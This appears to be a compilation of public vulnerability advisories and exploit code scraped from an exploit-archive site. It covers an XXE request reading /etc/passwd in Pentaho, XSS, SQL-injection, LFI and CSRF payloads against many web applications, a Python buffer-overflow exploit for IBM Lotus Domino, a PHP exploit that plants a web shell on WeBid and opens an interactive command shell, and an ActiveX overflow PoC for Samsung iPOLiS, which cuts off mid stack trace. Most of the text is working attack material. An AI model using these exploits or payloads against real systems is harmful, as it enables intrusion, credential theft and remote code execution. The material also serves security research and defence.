HireHackking

======================================================================== title: Pentaho User Console XML Injection Vulnerability program: Pentaho BI User Console vulnerable version: Pentaho < 4.5.0 homepage: http://www.pentaho.com/ Tested on: Linux x86/x86_64 found: Feb. 5 2014 Original Discovery by: Taylor Tippins Exploit By: K.d Long kd@stonedcoder.org ======================================================================== Vendor description: ------------------- The Pentaho Business Analytics suite manages Business Intelligence solutions, generate the reports, data aggregation, and provides users access to analysis views. Vulnerability description: -------------------------- The dashboardXml parameter is vulnerable to XML external entity injection. The tag <!DOCTYPE foo [<!ENTITY xxe8295c SYSTEM "file:///etc/passwd"> ]> was injected into the XML of the client's POST request. This tag defines an external entity, xxe8295c, which references a file on the XML parser's filesystem. This entity was then used within a data field in the XML document. The server's response contains the contents of the specified file, indicating that the parser processed the injected external entity. By manipulating the POST request to “/pentaho/content/dashboards” it is possible to inject arbitrary XML declarations- and tags. This request is triggered while a user is creating a customized dashboard. Proof of concept: ----------------- The following entity declaration would create a new XML entity with the content of the /etc/passwd file which can be referenced in the following XML request content: ---cut here--- POST /pentaho/content/dashboards HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en;q=0.5 Referer: https://example.com/pentaho/content/dashboards?command=new Cookie: loginNewWindowChecked=false; JSESSIONID=61448378278C147D05BC95BAB4B63F19 Content-Length: 2458 Connection: keep-alive command=templatecontents&dashboardXml=<!DOCTYPE foo [<!ENTITY xxe8295c SYSTEM "file:///etc/passwd"> ]><dashboard> <title>New Dashboard</title> <heading>New Dashboard</heading> <enableWidgetPrinting>false</enableWidgetPrinting> <documentation> <author>test</author> <description></description> <icon></icon> </documentation> <template-ref>xul/04-1-then-2.xul&xxe8295c;</template-ref> <theme-ref>00-Onyx</theme-ref> <layout> <overlay xmlns:pho="http://www.pentaho.com"> <box id="Panel_1" pho:title="Untitled 1" type="titled-panel" flex="1" collapsed="false" /> <box id="Panel_2" pho:title="Untitled 2" type="titled-panel" flex="1" collapsed="false" /> <box id="Panel_3" pho:title="Untitled 3" type="titled-panel" flex="1" collapsed="false" /> <box id="Panel_4" pho:title="Untitled 4" type="titled-panel" flex="1" collapsed="false" /> <box id="Panel_5" pho:title="Untitled 5"/> <box id="Panel_6" pho:title="Untitled 6"/> <box id="Panel_7" pho:title="Untitled 7"/> <box id="Panel_8" pho:title="Untitled 8"/> <box id="Panel_9" pho:title="Untitled 9"/> <box id="Panel_10" pho:title="Untitled 10"/> <box id="titlebar" title="" height="23" hidden="false" width="0" type="pagetitle" collapsed="false" /><box id="widget-area" type="scrollarea"/><box id="widget-area" flex="1"/><box id="FilterPanel" title="" height="100" hidden="true" width="0" type="povpanel" collapsed="false" /><box id="hbox1" type="layout"/><box id="hbox1" flex="1"/><box id="hbox2" type="layout"/><box id="hbox2" flex="1"/></overlay> </layout> <parameters> </parameters> <widgetJavascript><![CDATA[[]]]></widgetJavascript> </dashboard> &type=html ---cut here--- Vulnerable versions: -------------------- Pentaho User Console Release 4.5.0.GA.49857 Vendor contact timeline: ------------------------ 02/16/2014: Vendor notified via email

source: https://www.securityfocus.com/bid/49614/info Orion Network Performance Monitor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Orion Network Performance Monitor 10.1.3 is affected; other versions may also be vulnerable. http://www.example.com/Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgRTLoss&NetObject=N:355&ResourceID=17&NetObjectPrefix=N&Rows=&Title=%3Cscript%3Ealert%28%27ALERTA%27%29%3C/script%3E

source: https://www.securityfocus.com/bid/49620/info Microsoft SharePoint is prone to multiple URI open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. Successful exploits may redirect a user to a potentially malicious site; this may aid in phishing attacks. The following products are affected; Microsoft SharePoint 2007 Microsoft SharePoint 2010 http://www.example.com/Docs/Lists/Announcements/NewForm.aspx?Source=[xss]

source: https://www.securityfocus.com/bid/49625/info Auctions plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Owen Cutajar Auctions versions 1.8.8 and prior are vulnerable. http://www.example.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

source: https://www.securityfocus.com/bid/49650/info StarDevelop LiveHelp is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. StarDevelop LiveHelp 2.0 is vulnerable; other versions may also be affected. http://www.example.com/[path]/index.php?language_file=[LFI]%00

source: https://www.securityfocus.com/bid/49660/info PunBB is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. GET /login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script> GET /misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script> POST /delete.php?id=>"&#039;><script>alert(oink)</script> form_sent=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_confirm=>"&#039;><script>alert(oink)</script>&delete=>"&#039;><script>alert(oink)</ script> POST /edit.php?id=>"&#039;><script>alert(oink)</script> form_sent=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_message=>"&#039;><script>alert(oink)</script>&submit=>"&#039;><script>alert(oink)</ script> POST /login.php?action=>"&#039;><script>alert(oink)</script> form_sent=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_email=>"&#039;><script>alert(oink)</script>&request_pass=>"&#039;><script>alert(oin k)</script> POST /misc.php?email=>"&#039;><script>alert(oink)</script> form_sent=>"&#039;><script>alert(oink)</script>&redirect_url=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_subject=>"&#039;><script>alert(o ink)</script>&req_message=>"&#039;><script>alert(oink)</script>&submit=>"&#039;><script>alert(oink)</script> POST /profile.php?action=>"&#039;><script>alert(oink)</script>&id=>"&#039;><script>alert(oink)</script> form_sent=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_old_password=>"&#039;><script>alert(oink)</script>&req_new_password1=>"&#039;><scri pt>alert(oink)</script>&req_new_password2=>"&#039;><script>alert(oink)</script>&update=>"&#039;><script>alert(oink)</script> POST /register.php?action=>"&#039;><script>alert(oink)</script> form_sent=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_username=>"&#039;><script>alert(oink)</script>&req_password1=>"&#039;><script>alert (oink)</script>&req_password2=>"&#039;><script>alert(369448)</script>&req_email1=>"&#039;><script>alert(oink)</script>&timezone=>"&#039;><script>alert(oink)</script>&register=>"&#039;> <script>alert(oink)</script>

source: https://www.securityfocus.com/bid/49667/info ASP Basit Haber Script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. ASP Basit Haber Script 1.0 is vulnerable; other versions may also be affected. http://www.example.com/haber.asp?id=28+union+select+0,kullaniciadi,sifre,3,4,5+from+admin

source: https://www.securityfocus.com/bid/49668/info Multiple Ay Computer products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/v1/urundetay.asp?id=21%28%29 http://www.example.com/v1/default.asp?getir=urunler&id=39%28%29 http://www.example.com/v1/linkler.asp?id=2%28%29 http://www.example.com/detay.asp?ilanid=8%28%29 [SQL] http://www.example.com/kategoriler.asp?id=4%28%29 [SQL] http://www.example.com/link.asp?page=referanslarimiz&id=2%28%29 [SQL] http://www.example.com/?catid=23+union+select+0,1,2,3,4,5+from+admin

source: https://www.securityfocus.com/bid/49673/info Toko LiteCMS is prone to an HTTP-response-splitting vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust. Toko LiteCMS 1.5.2 is vulnerable; other versions may also be affected. Cross Site Scripting Vulnerabilities <html> <title>Toko Lite CMS 1.5.2 (EditNavBar.php) Multiple Parameters XSS POST Injection</title> <body bgcolor="#1C1C1C"> <script type="text/javascript"> function xss(){document.forms["xss"].submit();} </script> <br /><br /> <form action="http://www.example.com/tokolite1.5.2/editnavbar.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss"> <input type="hidden" name="currPath" value=&#039;"><script>alert(1)</script>&#039; /> <input type="hidden" name="path" value=&#039;"><script>alert(2)</script>&#039; /> </form> <a href="javascript: xss();" style="text-decoration:none"> <b><font color="red"><center><h3>Exploit!</h3></center></font></b></a><br /><br /> </body></html> HTTP Response Splitting ==================================================================== /edit.php: -------------------------------------------------------------------- 3: $charSet = "iso-8859-1"; 4: $dir = "ltr"; 5: 6: if ( isset( $_POST[ "charSet" ] ) ) 7: { 8: $charSet = $_POST[ "charSet" ]; 9: 10: if ( $charSet == "windows-1255" ) 11: { 12: $dir = "rtl"; 13: } 14: } 15: 16: header( "Content-Type: text/html; charset=" . $charSet );

source: https://www.securityfocus.com/bid/49674/info Aspgwy Access is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Aspgwy Access 1.0.0 is vulnerable; other versions may also be affected. http://www.example.com/forum/search_results.asp?search_word=&matchword=[XSS]

source: https://www.securityfocus.com/bid/49676/info Apple Mac OS X Lion is prone to multiple security-bypass vulnerabilities. Local attackers can exploit these issues to obtain sensitive information or change the password of other users on the computer, without sufficient privileges. $ dscl localhost -read /Search/Users/bob $ dscl localhost -passwd /Search/Users/<username>

source: https://www.securityfocus.com/bid/49675/info net4visions is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The following products are affected: net4visions iBrowser 1.4.1 Build 10182009 net4visions iManager 1.2.8 Build 02012008 net4visions iGallery 1.0.0 iBrowser Plugin http://www.example.com/jscripts/tiny_mce/plugins/ibrowser/scripts/random.php?dir=<script>alert(&#039;zsl&#039;)</script> http://www.example.com/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/demo/phpThumb.demo.random.php?dir=<script>alert(&#039;zsl&#039;)</script> iManager Plugin http://www.example.com/jscripts/tiny_mce/plugins/imanager/scripts/random.php?dir=<script>alert(&#039;zsl&#039;)</script> http://www.example.com/jscripts/tiny_mce/plugins/imanager/scripts/phpThumb/demo/phpThumb.demo.random.php?dir=<script>alert(&#039;zsl&#039;)</script> iGallery Plugin http://www.example.com/jscripts/tiny_mce/plugins/iGallery/scripts/pthumb/demo/phpThumb.demo.random.php?dir=<script>alert(&#039;zsl&#039;)</script>

source: https://www.securityfocus.com/bid/49677/info Card sharj is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Card sharj 1.01 is vulnerable; other versions may also be affected. http://www.example.com/index.php?cardId=[sql inject] http://www.example.com/index.php?action=[sql inject] http://www.example.com/Card-sharj-scripts/admin/index.php Username & Password: admin' or '1=1

source: https://www.securityfocus.com/bid/49705/info IBM Lotus Domino is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Successfully exploiting this issue will allow remote attackers to execute arbitrary code with system-level privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial-of-service condition. Lotus Domino 8.5.2 is vulnerable; other versions may also be affected. #!/usr/bin/python import socket,struct,sys,os host="192.168.x.y" #server ip here! cookie="1234567890abcdef" #Set your Cookie credential here! Cookie = base64((usr:pwd)) #Shellcode = Using XOR [reg],reg to crash ("like" INT3 :)) Shellcode=chr(0x30) server=host,80 SEH=struct.pack("<L",0x60404672) # POP ESI - POP EBP - RETN nnotes.dll.60404672 nSEH=struct.pack("<L",0x4141347A) # INC ecx ;NOP # INC ecx ;NOP # JPE slep ;Detour vars="__Click=0&tHPRAgentName=" #tHPRAgentName => Vulnerable POST variable buf="A"*436 #sended buffer-nSEH-SEH slep="X"*46 #pre-shellcode to fix JPE landing #This function forges our POST request (with our Shellcode sure) def buildPOST(h,b,c): P="POST /webadmin.nsf/fmHttpPostRequest?OpenForm&Seq=1 HTTP/1.1\r\n" P+="Host: "+h+"\r\n" P+="User-Agent: oh sure\r\n" P+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" P+="Accept-Language: chinnese plz\r\n" P+="Accept-Encoding: gzip,deflate\r\n" P+="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" P+="Keep-Alive: 115\r\n" P+="Connection: keep-alive\r\n" P+="Referer: http://"+h+"/webadmin.nsf/dlgConfigPorts?ReadForm&objref=16\r\n" P+="Cookie: CWCweb=\"savedLocale:en\"\r\n" P+="Authorization: Basic "+c+"\r\n" P+="Content-Type: application/x-www-form-urlencoded\r\n" P+="Content-Length: %s\r\n" % str(len(b)) P+="\r\n" P+=b return P def main(): if os.name=="nt": os.system("cls") else: os.system("clear") print"\t->[ IBM Lotus Domino 8.5.2 Remote Stack Overflow ]<-" print"\t ->[Remote Code Execution Exploit]<-\n\n" print"[+] Crafting buffer..." #Creating POST content data buffer=vars+buf+nSEH+SEH+slep+Shellcode print"[+] Connecting to server..." s=socket.socket() #Trying connect to IBM Lotus Domino HTTP server try: s.connect(server) #We goin to exit if this fails except: print"[-] Error connecting to remote server..." sys.exit(0) print"[+] Crafting POST request..." #Crafting final POST post=buildPOST(host,buffer,cookie) print"[+] 0k, sending..." #Sending Shellcode to remote server s.send(post) #Server is running? Some fails :S try: print s.recv(2048) print"[x] Exploit failed!" #Else we achieve remote code execution successfully except: print"[+] Done!" s.close() print"\n[*] By @rmallof" if __name__=="__main__": main()

source: https://www.securityfocus.com/bid/49712/info i-Gallery is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks. i-Gallery 3.4 is vulnerable; other versions may also be affected. http://www.example.com/igallery.asp?d="><script>alert('kurd-team')</script>

source: https://www.securityfocus.com/bid/49733/info OneCMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. OneCMS 2.6.4 is vulnerable; other versions may also be affected. http://www.example.com/boards.php?t=list&rank=[SQL insertion attacks] http://www.example.com/index.php?load=list&view=games&abc=[SQL insertion attacks]

source: https://www.securityfocus.com/bid/49721/info Free Help Desk is prone to the following input-validation vulnerabilities: 1. A cross-site scripting vulnerability 2. Multiple SQL-injection vulnerabilities 3. A cross-site request-forgery vulnerability Exploiting these issues could allow an attacker to execute arbitrary code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Free Help Desk 1.1b is vulnerable; other versions may also be affected. SQL injection: URIs http://www.example.com/index.php?sub=users&action=edit&user_id=-1%27%20union%20select%201,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20+--+ http://www.example.com/index.php?sub=types&action=edit&type_id=123%27%20union%20select%201,2,version%28%29,4,5,6%20+--+ http://www.example.com/index.php?sub=help&action=details&call_id=1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20+--+ http://www.example.com/index.php?sub=help&call_first_name=%22%20and%201=1%20+--+ Inputs: <form action="http://www.example.com/index.php" method="post"> <input type="hidden" name="user" value="' OR 1=1 -- "> <input type="hidden" name="pass" value="1"> <input name="send" value="exploit" type="submit"> </form> Cross-site scripting: URIs http://www.example.com/index.php?sub=types&action=add&type=1&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?sub=types&action=edit&type_id=15&type=1&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?sub=types&action=add&type=2&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?sub=types&action=edit&type_id=8&type=2&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?sub=staff&action=add&type=&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?sub=staff&action=edit&type_id=7&type=&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?sub=types&action=add&type=3&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E Cross-site request-forgery: Input: <form action="http://www.example.com/index.php?sub=users&action=store&type=add" method="post"> <input type="hidden" name="user_id" value=""> <input type="hidden" name="user_name" value="newadmin"> <input type="hidden" name="user_login" value="newadmin"> <input type="hidden" name="user_password" value="123456"> <input type="hidden" name="user_password_confirm" value="123456"> <input type="hidden" name="user_level" value="0"> <input type="hidden" name="user_email" value=""> <input type="submit" id="btn"> </form> <script> document.getElementById('btn').click(); </script>

source: https://www.securityfocus.com/bid/49729/info phpRS is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. phpRS 2.8.1 is vulnerable; other versions may also be affected. http://www.example.com/phpRS Path/view.php?cisloclanku=1%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://www.example.com/phpRS Path/search.php?rstema=%3Cbody%20onload%3dalert%28document.cookie%29%3E&rstext=all-phpRS-all&rsvelikost=sab http://www.example.com/phpRS Path/index.php?strana=%24%7binjecthere%7d http://www.example.com/phpRS Path/search.php?rstema=%24%7binjecthere%7d&rstext=all-phpRS-all&rsvelikost=sab http://www.example.com/phpRS Path/search.php?rstema=7&rstext=all-phpRS-all&rsvelikost=sab&stromhlmenu=%24%7binjecthere%7d http://www.example.com/phpRS Path/view.php?cisloclanku=1%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://www.example.com/phpRS Path/search.php?rstema=%3Cbody%20onload%3dalert%28document.cookie%29%3E&rstext=all-phpRS-all&rsvelikost=sab http://www.example.com/phpRS Path/index.php?strana=%24%7binjecthere%7d http://www.example.com/phpRS Path/search.php?rstema=%24%7binjecthere%7d&rstext=all-phpRS-all&rsvelikost=sab http://www.example.com/phpRS Path/search.php?rstema=7&rstext=all-phpRS-all&rsvelikost=sab&stromhlmenu=%24%7binjecthere%7d

source: https://www.securityfocus.com/bid/49740/info Zyncro is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. Note: To exploit these issues, an attacker must have the ability to create a new group and capture the packets transferred. An attacker could exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting victim in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Zyncro 3.0.1.20 is vulnerable; other versions may also be affected. One of the functionalities of Zyncro is the possibility of creating groups. The name and description of the groups are not correctly sanitized and it's possible to provoke some attacks. In order to do the attack, you must create a new group and capture the packet transferred to the server to modify it because validation is done in client-side (only) using javascript. The original request has three POST data parameters like: popup=1 & name=dGVzdA%3D%3D & description=dGVzdA%3D%3D Important data are 'name' and 'description' parameters, which are base64 encoded. In this case, both values are 'test': url_decode(dGVzdA%3D%3D) b64decode(dGVzdA==) test It is possible to provoke the XSS by changing those values as follows: "><script>alert("XSS attack")</script> Values MUST be in base64, so: b64encode(""><script>alert("XSS attack")</script>") = Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4= Finally the post-data of the request would become: popup=1&name=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d&description=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d Once the request has reached the server, a new group would be created and any time that someone sees the name/description of the group, a pop-up would appear, this is the easiest attack.

source: https://www.securityfocus.com/bid/49741/info Zyncro social network is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com//zwall/list/filter//appIdFilter//shareGroupUrnFilter/c3luY3J1bTpzaGFyZWdyb3VwOjMyYjMyZjljLTg3OWEtNDRjNC05ZWY1LTE2ZDQ4YTlhYTE2Nycgb3IgJzEnIGxpa2UgJzEnIGxpbWl0IDIwMCAtLQ==/shareGroupTypeFilter//shareDocumentUrnFilter/?popup=1&ayuda=&actualSection=folders&plainView=1&rand=9809

<?php /* ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' Exploit Title : WeBid 1.1.1 Unrestricted File Upload Exploit Date : 20 February 2015 Exploit Author : CWH Underground Site : www.2600.in.th Vendor Homepage : http://www.webidsupport.com/ Software Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download Version : 1.1.1 Tested on : Window and Linux ##################################################### VULNERABILITY: Arbitrary File Upload Vulnerability ##################################################### /ajax.php /inc/plupload/examples/upload.php ##################################################### DESCRIPTION ##################################################### This exploit a file upload vulnerability found in WeBid 1.1.1, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution. ##################################################### EXPLOIT ##################################################### */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+----------------------------------------+"; print "\n| WeBid Unrestricted File Upload Exploit |"; print "\n+----------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /WeBid/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"name\"\r\n\r\n"; $payload .= "shell.php\r\n"; $payload .= "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n"; $payload .= "Content-Type: application/octet-stream\r\n\r\n"; $payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n"; $payload .= "--o0oOo0o--\r\n"; $packet = "POST {$path}ajax.php?do=uploadaucimages HTTP/1.1\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; $packet .= "Cookie: PHPSESSID=cwh"."\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; print "\n\nExploiting..."; sleep(2); print "Waiting for shell...\n"; sleep(2); http_send($host, $packet); $packet = "GET {$path}uploaded/cwh/shell.php HTTP/1.1\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; print "\n ,--^----------,--------,-----,-------^--, \n"; print " | ||||||||| `--------' | O \n"; print " `+---------------------------^----------| \n"; print " `\_,-------, _________________________| \n"; print " / XXXXXX /`| / \n"; print " / XXXXXX / `\ / \n"; print " / XXXXXX /\______( \n"; print " / XXXXXX / \n"; print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; print " (________( \n"; print " `------' \n"; while(1) { print "\nWebid-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ################################################################################################################ # Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################ ?>

Document Title: ============ Beehive Forum v1.4.4 Stored XSS Vulnerability Author: ============== Halil Dalabasmaz Release Date: =========== 23 Feb 2015 Product & Service Introduction: ======================== Beehive is an open-source project for creating a high-configurable frame-based discussion forum. Vendor Homepage: ================= http://www.beehiveforum.co.uk Abstract Advisory Information: ======================= BGA Security Team discovered an Stored XSS vulnerability in Beehive Forum v1.4.4 Vulnerability Disclosure Timeline: ========================= 20 Feb 2015 - Contact with Vendor 21 Feb 2015 - Vendor Response 22 Feb 2015 - Vendor Fix 23 Feb 2015 - Confirm Fix 23 Feb 2015 - Public Disclosure Discovery Status: ============= Published Affected Product(s): =============== Beehive Forum v1.4.4 Exploitation Technique: ================== Remote, Unauthenticated Severity Level: =========== High Technical Details & Description: ======================== Stored XSS Tested On: ============ Iceweasel & Chromium Sample Payload: ================= http://"><script>alert('XSS');</script> Proof of Concept (PoC): ======================= Proof of Concept The vulnerable inputs are "Homepage URL", "Picture URL" and "Avatar URL" on Profile Section. Following line contain the vulnerability in edit_prefs.php; if (isset($_POST['homepage_url'])) { $user_prefs['HOMEPAGE_URL'] = trim($_POST['homepage_url']); $user_prefs_global['HOMEPAGE_URL'] = (isset($_POST['homepage_url_global'])) ? $_POST['homepage_url_global'] == "Y" : true; if (strlen(trim($user_prefs['HOMEPAGE_URL'])) > 0) { if (preg_match('/^http:\/\//u', $user_prefs['HOMEPAGE_URL']) < 1) { $error_msg_array[] = gettext("Homepage URL must include http:// schema."); $valid = false; } else if (!user_check_pref('HOMEPAGE_URL', $user_prefs['HOMEPAGE_URL'])) { $error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Homepage URL")); $valid = false; } } } if (isset($_POST['pic_url'])) { $user_prefs['PIC_URL'] = trim($_POST['pic_url']); $user_prefs_global['PIC_URL'] = (isset($_POST['pic_url_global'])) ? $_POST['pic_url_global'] == "Y" : true; if (strlen(trim($user_prefs['PIC_URL'])) > 0) { if (preg_match('/^http:\/\//u', $user_prefs['PIC_URL']) < 1) { $error_msg_array[] = gettext("Picture URL must include http:// schema."); $valid = false; } else if (!user_check_pref('PIC_URL', $user_prefs['PIC_URL'])) { $error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Picture URL")); $valid = false; } } } if (strlen(trim($user_prefs['AVATAR_URL'])) > 0) { if (preg_match('/^http:\/\//u', $user_prefs['AVATAR_URL']) < 1) { $error_msg_array[] = gettext("Avatar URL must include http:// schema."); $valid = false; } else if (!user_check_pref('AVATAR_URL', $user_prefs['AVATAR_URL'])) { $error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Avatar URL")); $valid = false; } } Solution Fix & Patch: ================ Upgrade the the script. Security Risk: ========== The risk of the vulnerabilities above estimated as high. Disclaimer & Information: =================== The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domain: www.bga.com.tr Social: twitter.com/bgasecurity Contact: advisory@bga.com.tr Copyright © 2015 | BGA - Bilgi Güvenliği Akademisi

<!-- # Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555) # Date: 22/02/2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx # Version: Samsung iPOLiS 1.12.2 # Tested on: Windows 7 Ultimate N SP1 # CVE: 2015-0555 --> <html> <!-- Vulnerability found and PoC coded by Praveen Darshanam http://blog.disects.com CVE-2015-0555 targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx" prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long" memberName = "WriteConfigValue" progid = "XNSSDKDEVICELib.XnsSdkDevice" Operating System = Windows 7 Ultimate N SP1 Vulnerable Software = Samsung iPOLiS 1.12.2 CERT tried to coordinate but there wasn't any response from Samsung --> <head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head> <object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object> <script> var arg1 = ""; var arg2="praveend"; for (i=0; i<= 15000; i++) { arg1 += "A"; } target.WriteConfigValue(arg1 ,arg2); </script> </html> <!-- #############Stack Trace#################### Exception Code: ACCESS_VIOLATION Disasm: 149434 MOV AL,[ESI+EDX] Seh Chain: -------------------------------------------------- 1 647C7D7D 